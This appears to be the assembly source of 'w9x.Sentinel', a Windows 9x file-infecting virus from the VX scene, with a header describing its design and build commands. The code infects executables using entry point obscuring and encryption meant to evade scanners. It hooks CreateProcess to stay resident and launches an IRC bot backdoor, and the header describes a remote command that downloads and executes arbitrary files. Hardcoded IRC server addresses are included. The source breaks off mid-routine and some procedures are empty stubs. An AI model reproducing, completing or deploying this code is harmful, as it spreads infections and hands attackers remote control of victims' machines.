;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=;
; w9x.Sentinel 1.1 (c)oded 2000 by f0re
;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=;
;
; Abstract
; --------
; This is the sourcecode of my first resident w32 virus. It uses advanced
; EPO (entry point obscuring) and has backdoor capabilities via IRC.
;
;
; Virus Specification
; -------------------
; When an infected file is executed the decryptor receives control and
; decrypts the virus with the decryption key on the stack (see EPO
; specification). Next the virus goes resident by using the vxdcall0
; backdoor and hooks the CreateProcess api by modifying its address in the
; kernel32.dll export table in memory.
;
; When a new process is created the virus routine receives control and, if
; not already present, launches a new thread in which an IRC bot may be
; started (see IRC-BOT specification). Next it will try to infect the
; executed file.
;
; The infection procedure consists globally of the following steps. First
; it will search for a cavity in the file's code section and if one is
; found, it laces there the JumpVirus routine (see EPO specification).
; Second it will search for the nth call or jmp opcode in the code section
; to replace it with a call to this routine (again see EPO specification).
; Third it will copy the decryptor to the end of the file. Fourth it
; encrypts and copies the other portion of the virus to the file. The
; encryption key that is used is the offset of the returnaddress of the
; patched api call/jmp. Finally, after the file is infected, the original
; CreateProcess api code is executed.
;
;
; EPO specification
; ---------------------
; As already described, during infection the nth api call or (indirect)
; api jmp opcode in the code section of the file is replaced by a call
; to the JumpVirus routine (n is a random number). This routine was placed
; in a cavity somewhere in the code section. The JumpVirus routine holds
; the following 14 bytes of code:
;
; JumpVirusCode:
; xxxx = virtual address of JumpToVirusEntryPoint
; JumpToVirusEntryPoint:
; mov eax, [esp]
; add eax, delta
; jmp eax
;
; From the stack this routine takes the return address from the call. Next
; a precalculated number, called delta, (calculated during infection) is
; added which gives the virtual address of the virus entrypoint. After
; jumping to the virusdecryptor code the decryption key is taken from the
; stack (this is the return address from the call) and the viruscode can
; be decrypted.
;
; For a virusscanner it is now much harder to decrypt the virus; it first
; needs to find the return address of the api call or the address of the
; cavity and the size of the virus or both to be able to decrypt the
; virus.
;
;
; IRC BOT specification
; ---------------------
; When the IRC routine is launched, it will try to find an internet
; connection and if one is found, it launches an IRC BOT, ***a sentinel***
; which goes to undernet #sntnl. There it will sit and wait for remote
; commands. The nickname of a sentinel consists of a randomly chosen name
; from a list of names followed by two random numbers. In the rest of
; this text the name of a sentinel is indicated by xxx. A sentinel can
; understand a number of commands which can be send to a sentinel
; privately or to all sentinels at once by sending the message to the
; channel. The following messages are understood:
;
; * all IRC commands, send with the following stucture:
;
; /msg xxx pass /<ircommand> <params>
;
; so for example: /msg xxx pass /privmsg #sntnl :hello there
;
; * the installer-command, send with the following structure:
;
; /msg xxx pass /ex3c [<ipnumber>] [<get-command>]
;
; where <ipnumber> = ip-number of server where executable should
; be downloaded.
;
; where <get-command> = the exact command according to the HTTP
; protocol to retrieve the file.
;
; So the command may for example look like:
;
; /msg xxx pass /ex3c [123.45.67.89] [GET /filename.exe HTTP/1.0]
;
; If a sentinel receives this command it will download the
; specified file. Only when the it has succesfully received the
; entire file it will execute the file.
;
; * the status-command, send with the following structure:
;
; /msg xxx pass /st4t
;
; If a sentinel receives this command, it will show the status of
; the installer. Five different statuses are possible:
;
; Waiting/Unable to connect/Installing/Size error/Done
;
; * the quit-command, send with the following structure:
;
; /msg xxx pass /qu1t
;
; * the nick-command, send with the following structure:
;
; /msg xxx pass /n1ck
;
; This commands tells a sentinel to change its nick into a random
; 5 character long name.
;
;
; To Compile
; ----------
; tasm32 sentinel.asm /m /ml
; tlink32 -aa sentinel.obj lib\import32.lib
;
;
; Greetz
; ------
; Greetz go to (in random order): Blackjack, Darkman, MrSandman, Mdrg,
; Prizzy, Benny, rgo32, Asmod, Lord Julus, Spanska, DrOwlFS, Bumblebee,
; VirusBuster, LifeWire, Gbyte, r-, veedee, spo0ky, t00fic and last but
; not least all the other people from #virus/#vxers.
;
;
;"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""";
.386
.model flat, stdcall
locals
jumps
extrn ExitProcess:PROC
include inc\myinc.inc
include inc\wsocks.inc
.data
FirstCopy:
jmp RealStart
Start:
mov eax, dword ptr [esp] ; decryption key
pushad
call GetCurrentOffset
GetCurrentOffset:
pop esi
add esi, (RealStart - GetCurrentOffset)
mov ecx, ((Leap - RealStart)/4 + 1) ; size to decrypt
DecryptVirus:
xor dword ptr [esi], eax ; decryption routine
add esi, 04h
loop DecryptVirus
DecryptionDone:
popad
RealStart:
push ebp
call GetDeltaOffset
GetDeltaOffset:
pop ebp
sub ebp, offset GetDeltaOffset
SetSEH:
lea eax, [ebp + ErrorHandler] ; set new SEH handler
push eax
push dword ptr fs:[0] ; save old SEH handler
mov dword ptr fs:[0], esp ; initiate SEH frame
CheckWindowsVersion:
mov eax, [ebp + kernel32address]
cmp word ptr [eax], 'ZM'
jne ErrorHandler
add eax, [eax + 3ch]
cmp word ptr [eax], 'EP'
jne ErrorHandler
RestoreSEH:
pop dword ptr fs:[0] ; restore old SEH
add esp, 4 ; handler
jmp MainRoutines
ErrorHandler:
mov esp, [esp + 8]
pop dword ptr fs:[0]
add esp, 4
jmp CheckEpoType
MainRoutines:
pushad
call FIND_GETPROCADDRESS_API_ADDRESS
call FIND_VXDCALL0_ADDRESS
call FIND_USER32_BASE_ADDRESS
call GO_RESIDENT
popad
CheckEpoType:
cmp [ebp + epo_opcode], 15FFh
jne EpoJmpExit
EpoCallExit:
mov eax, [ebp + epo_awaa_va] ; [eax]-> va original jmp
pop ebp
jmp [eax]
EpoJmpExit:
mov eax, [ebp + epo_awaa_va] ; [eax]-> va original jmp
mov [esp + 4], eax
pop ebp
pop eax
jmp [eax]
cp_oldapicodeaddress dd 0
cp_newapicodeaddress dd 0
cp_oldapicode db 06h dup(0)
cp_newapicode db 06h dup(0)
k32 db "KERNEL32.dll",0
user32 db "USER32.dll",0
imagehlp db "IMAGEHLP.dll",0
numberofnames dd 0
addressoffunctions dd 0
addressofnames dd 0
addressofordinals dd 0
AONindex dd 0
AGetProcAddress db "GetProcAddress", 0
AGetProcAddressA dd 0
AMessageBox db "MessageBoxA",0
AMessageBeep db "MessageBeep",0
AGetSystemTime db "GetSystemTime",0
AFindFirstFile db "FindFirstFileA",0
ACreateFile db "CreateFileA",0
ASetCurrentDirectory db "SetCurrentDirectoryA",0
ASetFileAttributes db "SetFileAttributesA",0
AGetFileAttributes db "GetFileAttributesA",0
ACreateFileMapping db "CreateFileMappingA",0
AMapViewOfFile db "MapViewOfFile",0
AUnmapViewOfFile db "UnmapViewOfFile",0
ACloseHandle db "CloseHandle",0
ASetFilePointer db "SetFilePointer",0
ASetEndOfFile db "SetEndOfFile",0
AGetModuleHandle db "GetModuleHandleA",0
ASetFileTime db "SetFileTime",0
ALoadLibrary db "LoadLibraryA",0
AGetSystemDirectory db "GetSystemDirectoryA",0
AGetWindowsDirectory db "GetWindowsDirectoryA",0
AGetFileSize db "GetFileSize",0
AGetCurrentDirectory db "GetCurrentDirectoryA",0
AVxdcall0A dd 0
ACheckSumMappedFile db "CheckSumMappedFile",0
maphandle dd 0
mapaddress dd 0
memory dd 0
imagebase dd 0
imagesize dd 0
filealign dd 0
sectionalign dd 0
filehandle dd 0
filesize dd 0
PEheader dd 0
ip_original dd offset OriginalHost
windowtitle db "W9x.Sentinel", 0
msgtxt db "Observing the world f0revir", 0
epo_newip dd 0
epo_cs_rva dd 0
epo_cs_pa dd 0
epo_ipnew_va dd 0
epo_ipnew_rva dd 0
epo_opcode dw 15ffh
epo_aoc_pa dd 0
epo_awaa_va dd offset ip_original
string db "ZZZZZZZZ", 0
ascvalues db "0123456789ABCDEF", 0
FIND_GETPROCADDRESS_API_ADDRESS proc
LoadExportTableData:
mov edi, [ebp + kernel32address] ; get exporttable
add edi, [edi + 3ch] ; address from
mov esi, [edi + 78h] ; kernel's PE header
add esi, [ebp + kernel32address]
BeginProcAddressSearch:
mov esi, [ebp + addressofnames] ; search for GetProc
mov [ebp + AONindex], esi ; Address API in names
mov edi, [esi] ; table
add edi, [ebp + kernel32address]
xor ecx, ecx
lea ebx, [ebp + AGetProcAddress]
TryAgain:
mov esi, ebx
MatchByte:
cmpsb
jne NextOne
cmp byte ptr [esi], 0 ; did the entire string
je GotIt ; match ?
jmp MatchByte
NextOne:
inc cx
add dword ptr [ebp + AONindex], 4 ; get next namepointer
mov esi, [ebp + AONindex] ; in table (4 dwords)
mov edi, [esi]
add edi, [ebp + kernel32address] ; align with kernelbase
jmp TryAgain
GotIt:
shl ecx, 1
mov esi, [ebp + addressofordinals] ; ordinal = nameindex *
add esi, ecx ; size of ordinal entry
xor eax, eax ; + ordinal table base
mov ax, word ptr [esi]
shl eax, 2 ; address of function =
mov esi, [ebp + addressoffunctions] ; ordinal * size of
add esi, eax ; entry of address
mov edi, dword ptr [esi] ; table + base of
add edi, [ebp + kernel32address] ; addresstable
mov [ebp + AGetProcAddressA], edi ; save GPA address
ret
FIND_GETPROCADDRESS_API_ADDRESS endp
FIND_VXDCALL0_ADDRESS proc
FindStartOfKernelExportSection:
mov esi, [ebp + kernel32address]
add esi, dword ptr [esi + 3ch]
mov edi, dword ptr [esi + 78h] ; virtual address of kernel32
add edi, [ebp + kernel32address] ; export section
GetVXDCallAddress:
mov esi, dword ptr [edi + 1Ch] ; get ra of table with
add esi, [ebp + kernel32address] ; pointers to funtion addresses
mov eax, dword ptr [esi]
add eax, [ebp + kernel32address]
mov [ebp + AVxdcall0A], eax
ret
FIND_VXDCALL0_ADDRESS endp
GETAPI proc
push eax
push dword ptr [ebp + kernel32address] ; load kernelbase
call [ebp + AGetProcAddressA] ; and get api address
jmp eax ; call the api
ret ; return
GETAPI endp
GETUAPI proc
push eax
push dword ptr [ebp + user32address] ; load user32base
call [ebp + AGetProcAddressA] ; and get api address
jmp eax
ret
GETUAPI endp
GETWAPI proc
push eax
push dword ptr [ebp + wsock32address] ; load wsockbase
call [ebp + AGetProcAddressA] ; and get api address
jmp eax
ret
GETWAPI endp
GETIAPI proc
push eax
push dword ptr [ebp + imagehlpaddress]
call [ebp + AGetProcAddressA]
jmp eax
ret
GETIAPI endp
GO_RESIDENT proc
CheckResidency:
mov eax, [ebp + kernel32address]
add eax, 400h
cmp dword ptr [eax], 'er0f'
je MemoryError ; already resident
PageReserve:
push 00020000h or 00040000h
push page_mem_size
push 80060000h
push 00010000h
call dword ptr [ebp + AVxdcall0A]
cmp eax, 0FFFFFFFh
je MemoryError
mov [ebp + resaddress], eax
CalculateVirusVirtualAddress:
mov ecx, offset InterceptCP - Start
add ecx, eax
mov [ebp + cp_newapicodeaddress], ecx
PageCommit:
push 00020000h or 00040000h or 80000000h or 00000008h
push 00000000h
push 00000001h
push page_mem_size
shr eax, 12
push eax
push 00010001h
call dword ptr [ebp + AVxdcall0A]
or eax, eax
je MemoryError
; IN: hookstruct:
; 00 : offset api name
; 04 : old apicodeaddress
; 08 ; offset for old apicode
; 12 ; offset for new apicode
; 16 : new apicodeaddress
CopyVirusToMemory:
cld
lea esi, [ebp + Start]
mov edi, [ebp + resaddress]
mov ecx, Leap-Start
rep movsb
SetResidentFlag:
mov eax, [ebp + kernel32address]
add eax, 400h
shr eax, 12d
ModifyPagePermissions2:
push 20060000h
push 00000000h
push 00000001h
push eax
push 0001000dh
call dword ptr [ebp + AVxdcall0A]
cmp eax, 0FFFFFFFh
je MemoryError
MemoryError:
ret
GO_RESIDENT endp
INFECT_FILE proc
SetFileAttributesToNormal:
push 80h
lea esi, [ebp + myfinddata.fd_cFileName] ; esi = filename
push esi
lea eax, [ebp + ASetFileAttributes]
call GETAPI
OpenFile:
push 0 ; template handle=0
push 20h ; attributes=any file
push 3 ; type= existing file
push 0 ; security option = 0
push 1 ; shared for read
push 80000000h or 40000000h ; generic read write
lea esi, [ebp + filenamebuffer]
push esi ; offset file name
lea eax, [ebp + ACreateFile]
call GETAPI
MapViewOfFile:
push [ebp + memory] ; memory to map
push 0 ; file offset
push 0 ; file offset
push 2 ; file map write mode
push eax ; file map handle
lea eax, [ebp + AMapViewOfFile] ; ok map the file
call GETAPI
or eax, eax
jz CloseMap
mov [ebp + mapaddress], eax ; save that base
CheckForMZMark:
cmp word ptr [eax], 'ZM' ; an exe file?
jne UnmapView
CheckInfectionMark:
cmp word ptr [eax + 38h], 'll' ; already infected?
je UnmapView
NotYetInfected:
mov esi, dword ptr [eax + 3ch]
cmp esi, 200h
ja UnmapView
add esi, eax
cmp dword ptr [esi], 'EP' ; is it a PE file ?
jne UnmapView
mov [ebp + PEheader], esi ; save va PE header
mov eax, [esi + 28h]
mov [ebp + ip_original], eax ; save original ip
mov eax, [esi + 34h]
mov [ebp + imagebase], eax ; save imagebase
CheckForEPO:
pushad
mov [ebp + epo_opcode], 15FFh ; search for call opcode
call CREATE_EPO
or eax, eax
jnz LocateBeginOfLastSection
mov [ebp + epo_opcode], 25FFh
call CREATE_EPO
or eax, eax
jnz LocateBeginOfLastSection
popad
jmp UnmapView
LocateBeginOfLastSection:
popad
movzx ebx, word ptr [esi + 20d] ; optional header size
add ebx, 24d ; file header size
movzx eax, word ptr [esi + 6h] ; no of sections
dec eax ; (we want the last-1
mov ecx, 28h ; sectionheader)
mul ecx ; * header size
add esi, ebx ; esi = begin of last
add esi, eax ; section's header
CheckForOverLays:
mov eax, [esi + 10h] ; section phys size
add eax, [esi + 14h] ; section phys offset
mov ecx, [ebp + PEheader]
mov ecx, [ecx + 38h]
div ecx
inc eax
mul ecx
mov ecx, [ebp + filesize]
cmp ecx, eax
ja UnmapView ; we dont infect those
mov ecx, 08h
CheckForZipSFX:
lea edi, [ebp + zip]
push ecx
push esi
mov ecx, 03h
rep cmpsb
pop esi
pop ecx
je UnmapView
inc esi
loop CheckForZipSFX
ChangeLastSectionHeaderProperties:
sub esi, 08h
or dword ptr [esi + 24h], 00000020h or 20000000h or 80000000h
NewAlignedPhysicalSize:
mov eax, [esi + 8h] ; old virt size
add eax, Leap-Start
mov ecx, [ebp + PEheader]
mov ecx, [ecx + 3ch]
div ecx ; and align it to
inc eax ; the filealign
mul ecx
mov [esi + 10h], eax ; save it
NewAlignedVirtualSize:
mov eax, [esi + 8h] ; get old
push eax ; store it
add eax, Leap-Start
mov ecx, [ebp + PEheader]
mov ecx, [ecx + 38h]
div ecx ; and align it to
inc eax ; the sectionalign
mul ecx
mov [esi + 8h], eax ; save new value
NewAlignedImageSize:
mov eax, dword ptr [esi + 0ch] ; get virtual offset
add eax, dword ptr [esi + 8h] ; + new virtual size
mov [ebp + imagesize], eax ; = new imagesize
NewAlignedFileSize:
mov eax, dword ptr [esi + 10h] ; get new phys size
add eax, dword ptr [esi + 14h] ; add offset of phys
mov [ebp + filesize], eax ; size = filesize
CalculateNewIp:
pop eax
push eax
add eax, dword ptr [esi + 0ch] ; + virtual offset
mov [ebp + epo_ipnew_rva], eax ; new ip
CreateEpoIp:
add eax, [ebp + imagebase]
mov [ebp + epo_ipnew_va], eax
CalculateEncryptionKey:
mov ebx, [ebp + epo_aoc_pa]
sub ebx, [ebp + epo_cs_pa]
add ebx, [ebp + epo_cs_rva]
add ebx, 04h ; ebx-> original return address
add ebx, [ebp + imagebase] ; after call = encryption key
CalculateDelta:
mov eax, [ebp + epo_ipnew_va]
sub eax, ebx
mov [ebp + delta], eax
CopyVirusDecryptorToEndOfFile:
pop eax
mov edi, eax ; virtual size
add edi, [ebp + mapaddress] ; mapaddress
add edi, [esi + 14h] ; add raw data offset
lea esi, [ebp + Start] ; copy virus
mov ecx, (RealStart - Start)
rep movsb
PrepareToEncryptAndCopy:
mov ecx, ((Leap-RealStart)/4 + 1)
cld
EncryptAndCopyVirus:
movsd
sub edi, 04h
xor dword ptr [edi], ebx
add edi, 04h
loop EncryptAndCopyVirus
SearchForCavity:
mov esi, [ebp + epo_cs_pa]
mov ecx, [ebp + cs_rawsize]
call CAVITYSEARCH
or esi, esi
jz UpdatePEHeaderWithChanges
mov eax, esi
sub eax, [ebp + epo_cs_pa]
add eax, [ebp + epo_cs_rva]
add eax, [ebp + imagebase]
mov [ebp + cavity_va], eax
WriteVirusJumpIntoCavity:
add eax, 04h
mov dword ptr [esi], eax
add esi, 04h
mov dword ptr [esi], 0524048Bh
add esi, 04h
mov eax, [ebp + delta]
mov dword ptr [esi], eax
add esi, 04h
mov word ptr [esi], 0E0FFh
SetEpo:
mov eax, [ebp + cavity_va]
mov edx, [ebp + epo_aoc_pa]
mov dword ptr [edx], eax
sub edx, 02h
mov word ptr [edx], 15FFh ; turn jmp into call
UpdatePEHeaderWithChanges:
mov esi, [ebp + mapaddress]
mov word ptr [esi + 38h], 'll' ; set infectionmark
mov esi, [ebp + PEheader]
mov eax, [ebp + imagesize]
mov [esi + 50h], eax ; set new imagesize
CalculateNewCheckSum:
cmp dword ptr [esi + 58h], 00h
je UnmapView
LoadImageHlpDll:
lea eax, [ebp + imagehlp]
push eax
lea eax, [ebp + ALoadLibrary]
call GETAPI
or eax, eax
jz UnmapView
mov [ebp + imagehlpaddress], eax
CalculateNewChecksum:
mov esi, [ebp + PEheader]
push dword ptr [esi + 58h]
lea eax, [ebp + buffer]
push eax
push dword ptr [ebp + filesize]
push dword ptr [ebp + mapaddress]
lea eax, [ebp + ACheckSumMappedFile]
call GETIAPI
UnmapView:
push dword ptr [ebp + mapaddress]
lea eax, [ebp + AUnmapViewOfFile]
call GETAPI
CloseMap:
push dword ptr [ebp + maphandle]
lea eax, [ebp + ACloseHandle]
call GETAPI
CloseFile:
push dword ptr [ebp + myfinddata.fd_ftLastWriteTime]
push dword ptr [ebp + myfinddata.fd_ftLastAccessTime]
push dword ptr [ebp + myfinddata.fd_ftCreationTime]
push dword ptr [ebp + filehandle]
lea eax, [ebp + ASetFileTime]
call GETAPI
InfectionError:
push dword ptr [ebp + myfinddata.fd_dwFileAttributes]
lea eax, [ebp + myfinddata.fd_cFileName]
push eax
lea eax, [ebp + ASetFileAttributes]
call GETAPI
ret
INFECT_FILE endp
RESIDENT_CP proc
InterceptCP:
pushad
call GetApiDelta
GetApiDelta:
pop ebp
sub ebp, offset GetApiDelta
call FIND_GETPROCADDRESS_API_ADDRESS
call FIND_USER32_BASE_ADDRESS
call RESIDENT_CP2
call IRC_LAUNCH
popad
GetNewDelta:
call NewDelta
NewDelta:
pop eax
sub eax, offset NewDelta
RestoreApiCode:
pushad
mov edi, [eax + cp_oldapicodeaddress]
lea esi, [eax + cp_oldapicode]
mov ecx, 06h
rep movsb
popad
ReHookApi:
pushad
call GetNewDelta2
GetNewDelta2:
pop ebp
sub ebp, offset GetNewDelta2
ReturnToOriginalCaller:
db 68h
returnaddress dd 0
ret
RESIDENT_CP endp
RESIDENT_CP2 proc
CheckForEmptyCommandLine:
mov esi, dword ptr [esp + 2ch]
or esi, esi
jz Continue
ExtractFileName:
xor ecx, ecx
cmp byte ptr [esi], '"'
jne FileNameNormal
inc esi
push esi
GetFileNamePartBetweenQuotes:
cmp byte ptr [esi], '"'
je GetBetweenQuotes
inc esi
inc ecx
cmp ecx, 100h
ja FileNameEndNotFound
jmp GetFileNamePartBetweenQuotes
GetBetweenQuotes:
mov edi, esi
pop esi
sub edi, esi ; esi hold start of filename
mov ecx, edi ; ecx holds size of filename
jmp StoreFileName
FileNameNormal:
push esi
GetNormalFileName:
cmp byte ptr [esi], ' '
je FoundNormalFileName
inc esi
inc ecx
cmp ecx, 100h
ja FileNameEndNotFound
jmp GetNormalFileName
FoundNormalFileName:
mov edi, esi
pop esi
sub edi, esi ; esi hold start of filename
mov ecx, edi ; ecx holds size of filename
jmp StoreFileName
FileNameEndNotFound:
pop esi
jmp Continue
StoreFileName:
push edi
push esi
push ecx
pop ecx
pop esi
pop edi
CheckForRem:
lea esi, [ebp + filenamebuffer]
cmp word ptr [esi], 'er'
jne FindFirstFile
inc esi
cmp word ptr [esi], 'me'
je Continue
FindFirstFile:
lea eax, [ebp + myfinddata] ; win32 finddata structure
push eax
lea eax, [ebp + filenamebuffer]
push eax
lea eax, [ebp + AFindFirstFile] ; find the file
call GETAPI
cmp eax, 0FFFFFFFFh ; file was not found
je Continue
CheckFileName:
cmp byte ptr [esi], 0
je Continue
cmp dword ptr [esi], 'mmud'
je InfectThisFile
inc esi
inc ecx
cmp ecx, 100h
ja Continue
jmp CheckFileName
InfectThisFile:
mov ecx, [ebp + myfinddata.fd_nFileSizeLow] ; ecx = filesize
mov [ebp + filesize], ecx ; save the filesize
add ecx, Leap - Start + 1000h ; filesize + virus
mov [ebp + memory], ecx ; + workspace = memory
call INFECT_FILE
Continue:
ret
RESIDENT_CP2 endp
HOOK_API proc
; IN: hookstruct:
; 00 : offset api name
; 04 : old apicodeaddress
; 08 ; offset for old apicode
; 12 ; offset for new apicode
; 16 : new apicodeaddress
FindKernelExportTable:
pushad
mov edi, [ebp + kernel32address]
add edi, dword ptr [edi + 3ch]
mov esi, dword ptr [edi + 78h]
add esi, [ebp + kernel32address]
GetNecessaryData:
mov eax, dword ptr [esi + 18h]
add eax, [ebp + kernel32address]
mov [ebp + numberofnames], eax ; save number of names
mov eax, dword ptr [esi + 1Ch] ; get ra of table with
add eax, [ebp + kernel32address]
mov [ebp + addressoffunctions], eax ; function addresses
mov eax, dword ptr [esi + 20h] ; get ra of table with
add eax, [ebp + kernel32address]
mov [ebp+addressofnames], eax ; pointers to names
mov eax, dword ptr [esi + 24h] ; get ra of table with
add eax, [ebp + kernel32address]
mov [ebp+addressofordinals], eax ; pointers to ordinals
BeginApiAddressSearch:
mov esi, [ebp + addressofnames] ; search for
mov [ebp + AONindex], esi ; API in names
mov edi, [esi] ; table
add edi, [ebp + kernel32address]
HookCreateProcess:
xor ecx, ecx
OkTryAgain:
lea ebx, [ebp + hookstruct]
mov esi, dword ptr [ebx]
MatchByteNow:
cmpsb
jne NextOneNow
cmp byte ptr [esi], 0 ; did the entire string
je YesGotIt ; match ?
jmp MatchByteNow
NextOneNow:
inc cx
add dword ptr [ebp + AONindex], 4 ; get next namepointer
mov esi, [ebp + AONindex] ; in table (4 dwords)
mov edi, [esi]
add edi, [ebp + kernel32address]
jmp OkTryAgain
YesGotIt:
shl ecx, 1
mov esi, [ebp + addressofordinals] ; ordinal = nameindex *
add esi, ecx ; size of ordinal entry
xor eax, eax ; + ordinal table base
mov ax, word ptr [esi] ; offset of address
shl eax, 2 ; of function = ordinal
mov esi, [ebp + addressoffunctions] ; * size of entry of
add esi, eax ; address table
mov edi, dword ptr [esi] ; get address
add edi, [ebp + kernel32address]
SetApiHook:
mov eax, edi
shr eax, 12d
ModifyPagePermissions:
push 20060000h
push 00000000h
push 00000001h
push eax
push 0001000dh
call dword ptr [ebp + AVxdcall0A]
SaveCreateProcessApiCode:
lea esi, [ebp + hookstruct]
mov esi, dword ptr [esi + 4]
mov esi, dword ptr [esi]
lea edi, [ebp + hookstruct]
mov edi, dword ptr [edi + 8]
mov ecx, 06h
rep movsb
PrepareCreateProcessApiCode:
lea esi, [ebp + hookstruct]
mov esi, dword ptr [esi + 12]
mov byte ptr [esi], 68h
inc esi
lea eax, [ebp + hookstruct]
mov eax, dword ptr [eax + 16]
mov eax, dword ptr [eax]
mov dword ptr [esi], eax
add esi, 04h
mov byte ptr [esi], 0c3h
ChangeCreateProcessApiCode:
lea edi, [ebp + hookstruct]
mov edi, dword ptr [edi + 4]
mov edi, dword ptr [edi]
lea esi, [ebp + hookstruct]
mov esi, dword ptr [esi + 12]
mov ecx, 06h
rep movsb
ApiHookError:
popad
ret
HOOK_API endp
CREATE_EPO proc
LocateCodeSectionHeader:
mov eax, [ebp + ip_original]
call FIND_SECTION
or eax, eax
jz ExitEpoRoutine
GetPointerToRawData:
mov eax, dword ptr [edi + 12d] ; eax = rva cs
mov [ebp + epo_cs_rva], eax
mov ecx, dword ptr [edi + 16d] ; raw size of code section
mov [ebp + cs_rawsize], ecx
mov edx, dword ptr [edi + 20d] ; RVA to raw data of code section
add edx, [ebp + mapaddress]
mov [ebp + epo_cs_pa], edx
mov esi, edx
ScanForOpcode:
lodsw
dec esi
FoundOpcode:
dec ecx
push esi
push ecx
inc esi
ExamineAddress:
mov [ebp + epo_aoc_pa], esi ; address of call
mov eax, dword ptr [esi]
mov [ebp + epo_awaa_va], eax ; address where api address
;pushad
;call MSG_BEEP
;popad
GetRVAImportTable:
mov esi, [ebp + PEheader]
mov eax, [esi + 80h] ; rva of import table
call FIND_SECTION
or eax, eax
jz NotFound
CompareAddressToImportAddress:
mov esi, [ebp + epo_awaa_va]
cmp edx, esi
jb CheckNotAbove
jmp NotFound
CheckNotAbove:
add edx, ecx
cmp edx, esi
ja FoundGoodInsertionPoint
NotFound:
pop ecx
pop esi
jmp ScanForOpcode
FoundGoodInsertionPoint:
mov eax, 0ah
call GET_RANDOM_NUMBER_WITHIN
cmp eax, 3h
ja NotFound
pop ecx
pop esi
mov eax, 01h
ExitEpoRoutine:
ret
CREATE_EPO endp
FIND_USER32_BASE_ADDRESS proc
GetUser32Base:
lea eax, [ebp + user32]
push eax
lea eax, [ebp + ALoadLibrary]
call GETAPI
mov [ebp + user32address], eax
ret
FIND_USER32_BASE_ADDRESS endp
FIND_WSOCK32_BASE_ADDRESS proc
LoadWsock32:
lea eax, [ebp + wsock32] ; not found, then
push eax ; load the dll
lea eax, [ebp + ALoadLibrary] ; first
call GETAPI
mov [ebp + wsock32address], eax
ret
FIND_WSOCK32_BASE_ADDRESS endp
FIND_SECTION proc
FindFirstSectionHeader:
mov esi, [ebp + mapaddress]
add esi, dword ptr [esi + 3ch] ; esi=offset peheader
movzx ecx, word ptr [esi + 06h] ; ecx = nr. of sections
movzx edi, word ptr [esi + 20d] ; optional header size
add esi, 24d ; file header size
add edi, esi
FindCorrespondingSection:
push eax
mov edx, dword ptr [edi + 12d] ; section RVA
sub eax, edx
cmp eax, dword ptr [edi + 08d] ; section size
jb SectionFound
NotThisSection:
pop eax
add edi, 40d
loop FindCorrespondingSection
EndSectionSearch:
xor eax, eax
ret
SectionFound:
pop eax
mov edx, dword ptr [edi + 12d]
add edx, [ebp + imagebase]
mov ecx, dword ptr [edi + 08d]
ret
FIND_SECTION endp
GET_RANDOM_NUMBER proc
GET_RANDOM_NUMBER endp
GET_RANDOM_NUMBER_WITHIN proc
push ebx
call GET_RANDOM_NUMBER
xchg eax,ebx ; EBX = number in range
xor eax,eax ; Zero EAX
xchg eax,edx ; EDX = 32-bit random number
div ebx ; EAX = random number within range
pop ebx
xchg eax, edx
ret
GET_RANDOM_NUMBER_WITHIN endp
CAVITYSEARCH proc
;-----------------------------------------------------------------------------
; Cavity search engine by Benny and Darkman of 29A
;
; Calling parameters:
; ECX = size of search area
; ESI = pointer to search area
;
; Return parameters:
; ESI = pointer to cave
CSE:
pushad
mov ebp, 14d ; EBP = size of cave wanted
lodsb ; AL = byte within search area
reset_cavity_loop:
xchg eax,ebx ; BL = " " " "
xor edx,edx ; Zero EDX
dec ecx ; Decrease counter
cmp ecx,ebp ; Unsearched search area large enough?
jb no_cave_found ; Below? Jump to no_cave_found
find_cave_loop:
lodsb ; AL = byte within search area
cmp al,bl ; Current byte equal to previous byte?
jne reset_cavity_loop ; Not equal? Jump to reset_cavity_loop
inc edx ; Increase number of bytes found in
; cave
cmp edx,ebp ; Found a cave large enough?
jne find_cave_loop ; Not equal? Jump to find_cave_loop
sub esi,ebp ; ESI = pointer to cave
jmp exit_cave
no_cave_found:
xor esi, esi
exit_cave:
mov [esp + 4],esi
popad
ret
;-----------------------------------------------------------------------------
CAVITYSEARCH endp
names dd 30d
name1 db 'pion',0
name2 db 'sarge',0
name3 db 'blink',0
name4 db 'midge',0
name5 db 'xaero',0
name6 db 'void',0
name7 db 'vivid',0
name8 db 'xeon',0
name9 db 'n0bs',0
name10 db 'helios',0
name11 db 'phobos',0
name12 db 'flux',0
name13 db 'hypno',0
name14 db 'bond',0
name15 db 'chaos',0
name16 db 'blup',0
name17 db 'sntnl',0
name18 db 'fire',0
name19 db 'water',0
name20 db 'earth',0
name21 db 'heart',0
name22 db 'stone',0
name23 db 'light',0
name24 db 'love',0
name25 db 'silver',0
name26 db 'surfer',0
name27 db 'panic',0
name28 db 'm00dy',0
name29 db 'texas',0
name30 db 'snow',0
name31 db 'beta',0
servers dd 04d
server1 db "195.112.4.25",0
server2 db "195.159.135.99",0
server3 db "195.121.6.196",0
server4 db "154.11.89.164",0
server5 db "205.188.149.3",0
port1 dd 7000d
port2 dd 6660d
port3 dd 6660d
port4 dd 6661d
port5 dd 6667d
GET_ITEM_FROM_LIST proc
GetItemFromList:
push edi
push esi
call GET_RANDOM_NUMBER_WITHIN
mov ecx, eax
pop esi
push eax
or ecx, ecx
jz GetSizeOfItem
GetPositionOfItem:
push ecx
call GET_STRING_SIZE
add esi, ecx
inc esi
pop ecx
loop GetPositionOfItem
GetSizeOfItem:
call GET_STRING_SIZE
pop eax
pop edi
ret
GET_ITEM_FROM_LIST endp
IRC_LAUNCH proc
IRCLaunch:
cmp [ebp + ircstatus], 00h
je CreateIRCThread
ret
CreateIRCThread:
lea eax, [ebp + ircthreadid]
push eax
push 00h
push 01h
lea eax, [ebp + IRC_THREAD]
push eax
push 00h
push 00h
lea eax, [ebp + ACreateThread]
call GETAPI
mov [ebp + ircstatus], 01h
ret
IRC_LAUNCH endp
IrcThreadEntryPoint:
pushad
call GetIrcDelta
GetIrcDelta:
pop ebp
sub ebp, offset GetIrcDelta
GetWSock32Base:
call FIND_GETPROCADDRESS_API_ADDRESS
call FIND_WSOCK32_BASE_ADDRESS
LoadWinInetDll:
lea eax, [ebp + wininet]
push eax
lea eax, [ebp + ALoadLibrary]
call GETAPI
or eax, eax
jz UserIsOffline
FindConnectionApiAddress:
